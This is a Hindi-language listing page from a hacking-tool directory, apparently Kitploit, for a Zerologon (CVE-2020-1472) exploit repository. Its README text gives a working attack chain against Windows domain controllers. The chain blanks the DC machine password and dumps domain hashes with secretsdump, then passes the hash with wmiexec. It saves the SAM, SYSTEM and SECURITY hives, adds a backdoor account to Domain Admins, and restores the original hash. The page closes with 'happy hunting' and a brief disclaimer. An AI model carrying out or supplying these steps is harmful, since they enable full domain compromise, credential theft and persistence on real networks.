Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/wrathfuldiety/zerologon
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubwrathfuldiety/zerologon

zerologon

CVE-2020-1472 का शोषण करने के लिए zerologon स्क्रिप्ट, CVSS 10/10

रिपॉजिटरी देखें
245 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

zerologon

CVE-2020-1472 CVSS 10/10 का शोषण करने के लिए zerologon स्क्रिप्ट एक्सप्लॉइट कोड https://www.secura.com/blog/zero-logon और https://github.com/SecuraBV/CVE-2020-1472 पर आधारित है। मूल शोध और स्कैनर Secura द्वारा, संशोधन RiskSense Inc. द्वारा। https://github.com/risksense/zerologon

शोषण के लिए, आपके पास मौजूद किसी भी पिछले Impacket इंस्टॉलेशन को हटा दें और https://github.com/SecureAuthCorp/impacket/commit/b867b21 या उससे नए Impacket को इंस्टॉल करें।

apt update

apt remove --purge impacket-scripts python3-impacket apt autoremove

git clone https://github.com/rthalley/dnspython.git sudo python3 setup.py install cd .. git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install git clone

फिर, यह करें:

python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

यदि यह सफल होता है तो आप यह कर पाएंगे:

sudo secretsdump.py -just-dc domain/hostname\$@ip

पासवर्ड प्रॉम्प्ट पर "Enter" दबाने से आप पास हो जाएंगे, जिससे आपको Domain Admin हैश मिल जाना चाहिए। उसके बाद, secretsdump से मिले एक क्रेडेंशियल के साथ wmiexec.py को लक्षित DC पर चलाएँ।

wmiexec.py domain/Administrator@ip -hashes hash

और करें:

reg save HKLM\SYSTEM system.save
get system.save
del /f system.save

reg save HKLM\SAM sam.save
get sam.save
del /f sam.save

reg save HKLM\SECURITY security.save
get security.save
del /f security.save

और फिर आप केवल मामले में एक नया Admin खाता बना सकते हैं,

net user myadmin Hello1234 /ADD /DOMAIN

और नए खाते को पूर्ण विशेषाधिकार प्राप्त करने के लिए domain admins समूह में जोड़ें,

net group "Domain Admins" myadmin /ADD /DOMAIN

और शायद अब C:> से exit करें।

फिर आप चला सकते हैं

sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

और यह आपको मशीन खाते का मूल NT हैश दिखाएगा। फिर आप निम्न द्वारा उस मूल मशीन खाता हैश को डोमेन में पुनः स्थापित कर सकते हैं:

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

DC के सामान्य रूप से संचालित होते रहने के लिए मूल हैश को पुनः स्थापित करना आवश्यक है।

और बस यह सुनिश्चित करने के लिए कि पुनर्स्थापना प्रक्रिया काम कर गई,

sudo secretsdump.py -just-dc domain/hostname\$@ip

और पासवर्ड प्रॉम्प्ट पर "Enter" दबाना अब काम नहीं करेगा।

और हम यहाँ पूरा कर चुके हैं।

शुभ शिकार।

अस्वीकरण: यह पूरी तरह से शैक्षिक उद्देश्यों के लिए है, मैं किसी भी कार्रवाई या उनके परिणामों के लिए ज़िम्मेदार नहीं हूँ। किसी और के डिवाइस में हैकिंग करना अवैध है और कानून द्वारा दंडनीय है।

टूल डाउनलोड करें